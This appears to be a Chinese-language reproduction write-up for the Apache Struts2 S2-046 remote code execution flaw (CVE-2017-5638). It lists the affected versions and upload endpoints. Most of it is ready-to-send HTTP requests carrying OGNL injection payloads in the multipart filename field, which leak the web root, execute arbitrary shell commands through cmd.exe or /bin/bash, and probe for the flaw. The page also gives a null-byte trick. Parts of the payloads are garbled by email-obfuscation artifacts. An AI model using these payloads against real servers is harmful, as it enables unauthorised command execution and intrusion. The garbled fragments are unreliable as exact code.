(CVE-2017-5638)s2-046

一、漏洞简介

使用Jakarta插件,程序没有正确处理文件上传,通过构造HTTP请求头中的Content-type造成RCE

二、漏洞影响

2.3.5-2.3.31

2.5.0-2.5.10

三、复现过程

常见访问路径

/struts2-showcase/fileupload/doUpload.action> /doUpload.action> /

POST / HTTP/1.1
Host: www.0-sec.org:8080
Content-Length: 549
Cache-Control: max-age=0
Origin: http://192.168.95.128:8080
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6WkqMfQ5bSxtxX4X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.95.128:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,und;q=0.7
Connection: close

------WebKitFormBoundary6WkqMfQ5bSxtxX4X
Content-Disposition: form-data; name="upload"; filename="Content-Disposition: form-data; name="image1"; filename="%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#memberAccess?(#memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#[email protected]@getRequest()).(#path=#req.getRealPath('/')).(#o.println(#path)).(#o.close())}b"
Content-Type: text/plain


------WebKitFormBoundary6WkqMfQ5bSxtxX4X

图片.png

抓流量 抓到一个 出web目录的 后面自己加\x00b

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#[email protected]@getRequest()).(#path=#req.getRealPath('/')).(#o.println(#path)).(#o.close())}

跟s2-048 payload是一样的 只有回显 好多都是通用的

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

还可以找到doUpload.action 然后真提交文件 拦截包 把filename 改了 要加\x00b

s2-046 特别多的工具都可以用。。抓流量分析流量 分析出来几个功能payload

安恒工具 命令执行 payload

POST / HTTP/1.1
Host:192.168.95.128:8080
Accept-Language: zh_CN
User-Agent: Auto Spider 1.0
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 874
Content-Type: multipart/form-data; boundary=---------------------------7e116d19044c

-----------------------------7e116d19044c
Content-Disposition: form-data; name="test"; filename="%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}.b"
Content-Type: text/plain

x
-----------------------------7e116d19044c--